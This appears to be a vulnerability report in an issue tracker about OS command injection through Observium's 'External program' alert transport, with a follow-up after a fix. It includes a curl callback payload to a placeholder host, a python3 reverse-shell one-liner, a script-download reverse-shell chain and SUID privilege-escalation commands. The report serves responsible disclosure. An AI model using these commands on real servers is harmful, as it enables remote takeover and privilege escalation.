Details
-
Bug
-
Resolution: Fixed
-
Major
-
None
-
CE-22.5
-
None
Description
Hello! I discovered the possibility of executing any OS commands through the "External program" transport. This functionality can allow a user with privilege level 10 to completely compromise the server. The exploitation of this vulnerability was tested on Observium CE 23.9.13005.
CVSS:3.1: 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Steps to reproduce the vulnerability:
- Create a contact with the "External program" transport. In the "External program path" field, insert the payload "curl YOUR_IP"
- Run the listener using netcat "sudo nc -lvnp 80"
- Create Alert Checkers and assign the contact created in step 1
- When an alert occurs, a curl request will be sent to your listener
To execute a command, just paste it into this field; there is no need to use additional special characters, as in the screenshot above.
The command specified in the "External program path" field will be executed from the user who is running Observium
The insecure design of this functionality jeopardizes the security of the server, since an attacker can specify a reverse shell as a command. This will allow him to access the server with the ability to execute any OS commands.
For example, just insert this python3 command to get a reverse shell (you also need to set a listener):
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("IP",PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")' |
@Mike Stupalov Hello! I took the time to look at the fixes.
It seems to me that it is conceptually unsafe to allow the "External program" transport to allow OS commands to be executed. Because the legal functionality of most commands can be abused. Despite the changes in version r13514, the current functionality still leads to compromise of the server.
Example 1 - Remote reverse shell: #
Raise a web server with an bash script
python3 -m http.serverPlace a bash script with contents in the python directory of the web server:
Set listener
Using the "External program" functionality, execute two commands sequentially
bash /tmp/shell.shExample 2 - Local privilege escalation via SUID-bit: #
Using the "External program" functionality, execute two commands sequentially
cp /bin/bash /tmp/shell_lpechmod u+s /tmp/shell_lpe